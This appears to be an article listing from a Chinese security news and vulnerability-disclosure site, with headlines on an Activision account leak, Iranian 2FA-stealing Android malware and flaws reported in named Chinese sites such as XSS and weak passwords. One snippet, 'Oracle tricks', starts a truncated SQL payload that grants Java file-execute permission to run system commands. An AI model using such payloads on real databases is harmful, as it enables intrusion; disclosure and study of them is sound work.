文章列表
动视发生严重个人资料泄漏事件:超50万账号被曝光
上周日晚上,Okami 和 TheGamingRevolution 等《使命召唤》的 Insider 率先报告了动视的本次安全事件,他们称黑客攻击是持续的。TheGamingRevolution 在推文中写道:“动视的账号显然正在泄漏,所以请尽快改变你的密码,尽管这可能甚至没有帮助,因为他们每 10 分钟就会窃取 1000 个账户”。虽然我们不
伊朗黑客组织开发 Android 恶意软件用于窃取双因素验证短信
安全公司Check Point表示,它发现了一个伊朗黑客组织开发的特殊Android恶意软件,能够拦截和窃取通过短信发送的双因素验证(2FA)代码。该恶意软件是该公司昵称为Rampant Kitten的黑客组织开发的黑客工具库的一部分。伪装成欧盟驾照培训辅助应用的AppCheck Point表示,该组织至少活跃了6年,一直在从事
汽车之家(autohome.com.cn) 找回密码功能校验不严导致可恶意找回
汽车之家(autohome.com.cn) 找回密码功能校验不严导致可恶意找回
特斯拉赢得对前员工的诉讼 后者被指黑客攻击公司的制造系统
路透社周五报道称,法院判决特斯拉胜诉,并驳回了Tripp再次向法院提交答辩的动议。特斯拉没有立即回应置评请求,但据路透社报道,法院将批准特斯拉封存案件的动议。两年前, Tripp在寻求举报人保护并指责特斯拉“一些非常可怕的事情”后,最初进入了人们的视线。他告诉《华盛顿邮报》,他是向媒体提供
南孚电池(nanfu.com) 某系统存在弱口令
南孚电池(nanfu.com) 某系统存在弱口令
动漫之家(dmzj.com) 某分站存在存储型XSS漏洞
动漫之家(dmzj.com) 某分站存在存储型XSS漏洞
oracle的一些小姿势
1.执行系统命令select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''begin dbms_java.grant_permission( ''''SYSTEM'''', ''''SYS:java.io.FilePermission'''', ''''<<ALL FILES>>'''',''''EXECUTE'''');end;''commit;end;') from dual;select dbms_xm
国家电网(sgcc.com.cn) 子站 存在敏感信息泄露/用户信息越权修改
国家电网(sgcc.com.cn) 子站 存在敏感信息泄露/用户信息越权修改
联想(lenovo.com.cn)某分站URL跳转导致反射型XSS
联想(lenovo.com.cn)某分站URL跳转导致反射型XSS
北京银行(bankofbeijing.com.cn)某分站敏感信息泄露
北京银行(bankofbeijing.com.cn)某分站敏感信息泄露
